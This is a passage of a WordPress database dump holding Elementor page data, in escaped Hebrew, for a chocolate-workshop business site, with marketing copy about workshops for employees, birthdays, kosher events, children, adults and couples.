\\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2300,432,'_elementor_edit_mode','builder'),(2301,432,'_elementor_template_type','wp-page'),(2302,432,'_elementor_version','2.7.5'),(2303,432,'_elementor_pro_version','2.7.3'),(2304,432,'_wp_page_template','elementor_header_footer'),(2305,432,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2306,432,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd 